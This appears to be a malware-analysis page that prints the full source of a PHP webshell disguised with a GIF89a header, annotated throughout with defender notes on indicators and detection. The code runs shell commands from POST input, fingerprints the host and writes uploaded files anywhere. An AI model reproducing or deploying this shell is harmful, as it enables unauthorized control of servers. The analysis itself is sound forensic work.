PHP Malware Analysis


Filename: flame.php

Tags

Encoding
  • base64_decode
Emails
  • mailer@testl.com
Title
  • ..:: ::..
Execution
  • system
  • exec
Input
  • _POST
  • _FILES
Environment
  • getcwd

Deobfuscated code

No deobfuscation yet.

Original code

GIF89a???????????!?????,???????D?;?
<b><?php
// Review notes (defender view): this is a captured webshell, annotated for what it does and
// what is detectable; nothing below is a fix. The line above the PHP open tag is a GIF89a
// header, so file-type checks that trust magic bytes see an image -- flag files whose magic
// bytes disagree with their PHP content.
	
// Session is started with errors suppressed; it is only consulted by the password gate below.
@session_start();
// As captured this statement has no terminating ';', so the file as listed would not parse.
// If it did, the false flag disables the password gate entirely -- the shell runs unauthenticated.
$create_password = false
// "ZG9kb25r" decodes to the fixed password "dodonk"; it is compared to POST 'pass' with loose ==.
// The base64 literal and the session key 'mailer' are usable as static indicators.
$password = base64_decode("ZG9kb25r");$pass=$_POST['pass'];if($pass==$password){$_SESSION['mailer']="$pass";}
// "Client IP" is taken from request headers (Client-IP, X-Forwarded-For) before REMOTE_ADDR.
// It is only echoed into the login page; for attribution rely on the web server's own access
// log and REMOTE_ADDR, not on this value.
if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);
// Dead code while $create_password is false: the session check (loose != against $password)
// never runs, so everything after this block is reachable without a password.
if($create_password==true){
if(!isset($_SESSION['mailer']) or $_SESSION['mailer']!=$password){
// Login page. The <title> "..::  ::..", the meta author/e-mail values and the
// "BraIn secure Shell" banner are static response-body indicators.
die("<title>..::  ::..</title>
<META http-equiv=\"content-type\" content=\"text/html;charset=iso-8859-1\">
<META content=\"mailer\" name=\"author\">
<META name=\"rating\" content=\"general\" />
<META http-equiv=\"pragma\" content=\"cache\" />
<META http-equiv=\"cache-control\" content=\"cache\" />
<META http-equiv=\"cache-control\" content=\"must-revalidate\" />
<META http-equiv=\"cache-control\" content=\"proxy-revalidate\" />
<META name=\"MSSmartTagsPreventParsing\" content=\"true\" />
<META name=\"robots\" content=\"all,index,follow\" />
<META name=\"googlebot\" content=\"all,index,follow\" />
<META name=\"allow-search\" content=\"yes\" />
<META name=\"audience\" content=\"all\" />
<META name=\"revisit\" content=\"2 days\" />
<META name=\"revisit-after\" content=\"2 days\" />
<META name=\"author\" content=\"mailer\" />
<META name=\"copyright\" content=\"mailer\" />
<META name=\"creator\" content=\"mailer\" />
<META name=\"generator\" content=\"mailer\" />
<META http-equiv=\"Reply-to\" content=\"mailer@testl.com\" />
<META name=\"distribution\" content=\"global\" />
<META name=\"classification\" content=\"..:: BraIn  Inc™ `09 ::.., Powered by mailer\" />
<META name=\"document-classification\" content=\"general\" />
<META name=\"rating\" content=\"general\" />
<meta name=\"description\" content=\"..:: BraIn  Inc™ `09 ::.. Powered by mailer\" />
<META content=\"index, follow\" name=\"robots\">
<META content=\"..:: BraIn  Inc™ `09 ::..,mailer\" name=\"keywords\">
<META name=\"dc.title\" content=\"..:: BraIn  Inc™ `09 ::..\" />
<META name=\"dc.creator.e-mail\" content=\"mailer@testl.com\" />
<META name=\"dc.creator.name\" content=\"mailer\" />
<body text=\"#FFFFFF\" bgcolor=\"#000000\" background=\"black\">
<br><br><br><br><br><br><br><br><br><br><br><center>
<table width=100 bgcolor=\"black\" border=1 bordercolor=\"white\"><tr><td>
<font size=1 face=verdana><center><b><font color=red>
..:: BraIn secure Shell ::..</font></a><br><br></b></center>
<form method=post>Password:<br><input type=password name=pass size=30 tabindex=1>
</form><font color=red><b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
<font color=red><b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
<font color=red><b>Your ip:</b> ".$ip."</td></tr></table>");}}


  // closelog() without any preceding openlog(); harmless, but distinctive in this position.
  closelog( );
  // Host fingerprinting: script owner, real/effective uid, gid and PHP version
  // (the posix_* calls need the posix extension).
  $user = get_current_user( );
  $login = posix_getuid( );
  $euid = posix_geteuid( );
  $ver = phpversion( );
  $gid = posix_getgid( );
  // $chdir and $whoami are never assigned in this file; they could only be pre-populated under
  // register_globals (removed in PHP 5.4), so on current PHP the branches always run and
  // exec("whoami") fires on every request -- a web-server worker spawning `whoami` is a
  // useful process-creation alert.
  if ($chdir == "") $chdir = getcwd( );
  if(!$whoami)$whoami=exec("whoami");
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
  // Renders posix_uname() key/value pairs, one table row each. each() was removed in PHP 8.0,
  // so this loop is a fatal error there. Further down, $SERVER_SOFTWARE / $SERVER_VERSION /
  // $SERVER_ADDR / $SERVER_NAME are register_globals-era names that are undefined on modern PHP,
  // and the "Permission Directory" row uses a short open tag (<?) that needs short_open_tag=On.
  $uname = posix_uname( );
  while (list($info, $value) = each ($uname)) {
?>
  <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b><span style="font-size: 9pt"><?= $info ?>
      <span style="font-size: 9pt">:</b> <?= $value ?></span></DIV></TD>
  </TR>
<?php
  // The row labels below ("User Info:", "Current Path:", "Permission Directory:",
  // "Server Services:", "Script Current User:") are stable response-body strings for detection.
  }
?>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= 

$gid ?>(<?= $whoami?>)</span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Current Path:</b> <?= $chdir ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>
    </span></DIV></TD>
  </TR>  
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
    </span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>
    </span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Script Current User:</b> <?= $user ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">PHP Version:</b> <?= $ver ?></span></DIV></TD>
  </TR>
</TABLE>
</b>
</div></font></div>

<?php
// Command-execution and upload half of the shell. Inputs: POST _cwd (working directory),
// _cmd (shell command), _act (button label), _upl (file). No authentication precedes this.

#set_magic_quotes_runtime(0);

// Raw POST values; the only processing is collapsing doubled backslashes (magic-quotes era).
$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

// Backtick operator: three shell commands run on every request, before any form is submitted.
// A PHP worker spawning a shell for uname/pwd/id with no user action is a good detection signal.
$UName  = `uname -a`;
$SCWD   = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
    $currentWD = $SCWD;
}

// The "List files!" button simply substitutes a fixed ls -la for the typed command.
if( $_POST['_act'] == "List files!" ) {
    $currentCMD = "ls -la";
}


// Control form. Field names _cmd/_cwd/_upl/_act and the button labels "Execute!",
// "List files!", "Upload!" are fixed strings suitable for request/response signatures.
print "<form method=post enctype=\"multipart/form-data\"><hr><hr><table>";

print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";

print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";

print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";

print "</table></form><hr><hr>";

// Un-escapes quotes that magic_quotes would have added; no other sanitisation of the command.
$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
        print "<center><b>Error while uploading file!</b></center>";
    } else {
        print "<center><pre>";
        // Arbitrary file write: the PHP upload temp file is moved via system("mv ...") into the
        // POST-supplied directory under the client-supplied filename, with no path, name or
        // extension checks. Detection: mv spawned by the web-server worker with the upload temp
        // file as its source; unexpected new files under the web root.
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "</pre><b>File uploaded successfully!</b></center>";
    }    
} else {
    // The HTML comment markers around the output are a stable response-body indicator.
    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
    // "cd <_cwd>;<_cmd>" is handed to system(); output is staged in the fixed path
    // /tmp/cmdtemp, cat'ed back, then removed. That path is a forensic artifact (file
    // create/unlink events). As captured the string literal spans two lines, so "rm" and
    // "/tmp/cmdtemp" reach the shell on separate lines -- if genuine rather than a wrapping
    // artifact, rm has no operand and the temp file is left on disk.
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
  system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm 
/tmp/cmdtemp");
    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
}

exit;

?>